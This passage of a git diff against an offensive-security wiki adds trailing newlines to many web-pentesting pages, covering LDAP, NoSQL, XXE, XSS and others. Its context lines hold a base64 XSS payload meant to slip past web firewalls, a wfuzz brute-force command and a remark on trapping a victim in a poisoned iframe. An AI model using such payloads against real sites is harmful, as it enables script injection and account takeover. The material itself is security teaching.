way to do this would be to **refresh the page**, however, this could be partially **prevented** by disabling the right click context menu every time a new page is loaded inside the iframe or noticing when the mouse of the user leaves the iframe, potentially to click the reload button of the browser and in this case the URL of the browser is updated with the original URL vulnerable to XSS so if the user reloads it, it will get poisoned again (note that this is not very stealth). {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md index 809af91ac..dbed29ef8 100644 --- a/src/pentesting-web/ldap-injection.md +++ b/src/pentesting-web/ldap-injection.md @@ -230,3 +230,4 @@ If you are interested in **hacking career** and hack the unhackable - **we are h {% embed url="https://www.stmcyber.com/careers" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md index 5e75d2d72..a0678235b 100644 --- a/src/pentesting-web/nosql-injection.md +++ b/src/pentesting-web/nosql-injection.md @@ -279,3 +279,4 @@ Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&u Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %} + diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index a5e3b906c..6a38d254b 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md @@ -239,3 +239,4 @@ If the platform you are testing is an OAuth provider [**read this to test for po {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 5a67a080a..c652963c4 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md @@ -195,3 +195,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/orm-injection.md b/src/pentesting-web/orm-injection.md index e5a19bf5c..e48834675 100644 --- a/src/pentesting-web/orm-injection.md +++ b/src/pentesting-web/orm-injection.md @@ -331,3 +331,4 @@ By brute-forcing and potentially relationships it was possible to leak more data - [https://positive.security/blog/ransack-data-exfiltration](https://positive.security/blog/ransack-data-exfiltration) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/parameter-pollution.md b/src/pentesting-web/parameter-pollution.md index 7c4ac0070..00baf24a4 100644 --- a/src/pentesting-web/parameter-pollution.md +++ b/src/pentesting-web/parameter-pollution.md @@ -233,3 +233,4 @@ Which might create inconsistences {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/phone-number-injections.md b/src/pentesting-web/phone-number-injections.md index 64da634e0..00e1b1083 100644 --- a/src/pentesting-web/phone-number-injections.md +++ b/src/pentesting-web/phone-number-injections.md @@ -17,3 +17,4 @@ It's possible to **add strings at the end the phone number** that could be used - [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md index c0a61c73d..739ef9209 100644 --- a/src/pentesting-web/proxy-waf-protections-bypass.md +++ b/src/pentesting-web/proxy-waf-protections-bypass.md @@ -232,3 +232,4 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/race-condition.md b/src/pentesting-web/race-condition.md index fdc298079..1bfb8e748 100644 --- a/src/pentesting-web/race-condition.md +++ b/src/pentesting-web/race-condition.md @@ -410,3 +410,4 @@ Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&u Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %} + diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md index 65f2fc4d4..73a1b474a 100644 --- a/src/pentesting-web/rate-limit-bypass.md +++ b/src/pentesting-web/rate-limit-bypass.md @@ -71,3 +71,4 @@ Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&u Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %} + diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md index b7acd3595..dffca5f0f 100644 --- a/src/pentesting-web/registration-vulnerabilities.md +++ b/src/pentesting-web/registration-vulnerabilities.md @@ -180,3 +180,4 @@ hacking-jwt-json-web-tokens.md - [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md index 405e366a4..343243075 100644 --- a/src/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md @@ -80,3 +80,4 @@ Regexp (a+)*$ took 723 milliseconds. - [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md index 30be2ad1d..984bdb012 100644 --- a/src/pentesting-web/reset-password.md +++ b/src/pentesting-web/reset-password.md @@ -217,3 +217,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md index b207d1c28..d49763f6e 100644 --- a/src/pentesting-web/reverse-tab-nabbing.md +++ b/src/pentesting-web/reverse-tab-nabbing.md @@ -81,3 +81,4 @@ Prevention information are documented into the [HTML5 Cheat Sheet](https://cheat - [https://owasp.org/www-community/attacks/Reverse_Tabnabbing](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 178598097..eb59391e9 100644 --- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -244,3 +244,4 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/timing-attacks.md b/src/pentesting-web/timing-attacks.md index 0b02361c9..d320181bd 100644 --- a/src/pentesting-web/timing-attacks.md +++ b/src/pentesting-web/timing-attacks.md @@ -37,3 +37,4 @@ Once an scoped open proxy is discovered, it was possible to find valid targets b - [https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/uuid-insecurities.md b/src/pentesting-web/uuid-insecurities.md index 3136e8eb8..9534f3dec 100644 --- a/src/pentesting-web/uuid-insecurities.md +++ b/src/pentesting-web/uuid-insecurities.md @@ -63,3 +63,4 @@ Imagine a web application that uses UUID v1 for generating password reset links. - [https://versprite.com/blog/universally-unique-identifiers/](https://versprite.com/blog/universally-unique-identifiers/) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/web-tool-wfuzz.md b/src/pentesting-web/web-tool-wfuzz.md index 87a87f0bd..8ee97702a 100644 --- a/src/pentesting-web/web-tool-wfuzz.md +++ b/src/pentesting-web/web-tool-wfuzz.md @@ -154,3 +154,4 @@ wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -- [https://github.com/carlospolop/fuzzhttpbypass](https://github.com/carlospolop/fuzzhttpbypass) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md index 9a5dc96f1..ad5a59ab9 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology.md +++ b/src/pentesting-web/web-vulnerabilities-methodology.md @@ -143,3 +143,4 @@ These vulnerabilities might help to exploit other vulnerabilities. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md index 2b3169a4e..1ea25a6cd 100644 --- a/src/pentesting-web/websocket-attacks.md +++ b/src/pentesting-web/websocket-attacks.md @@ -173,3 +173,4 @@ h2c-smuggling.md - [https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md index 960236fe0..fdc619aad 100644 --- a/src/pentesting-web/xpath-injection.md +++ b/src/pentesting-web/xpath-injection.md @@ -321,3 +321,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md index 77995a954..a67febee0 100644 --- a/src/pentesting-web/xs-search.md +++ b/src/pentesting-web/xs-search.md @@ -964,3 +964,4 @@ Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banne Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} + diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md index f1cf9eaf5..d4f2d7d00 100644 --- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md +++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md @@ -427,3 +427,4 @@ version="1.0"> - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xssi-cross-site-script-inclusion.md b/src/pentesting-web/xssi-cross-site-script-inclusion.md index 3812bf572..7adda7f22 100644 --- a/src/pentesting-web/xssi-cross-site-script-inclusion.md +++ b/src/pentesting-web/xssi-cross-site-script-inclusion.md @@ -98,3 +98,4 @@ Takeshi Terada's research introduces another form of XSSI, where Non-Script file ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index ffcad5f83..df5e77448 100644 --- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -785,3 +785,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} +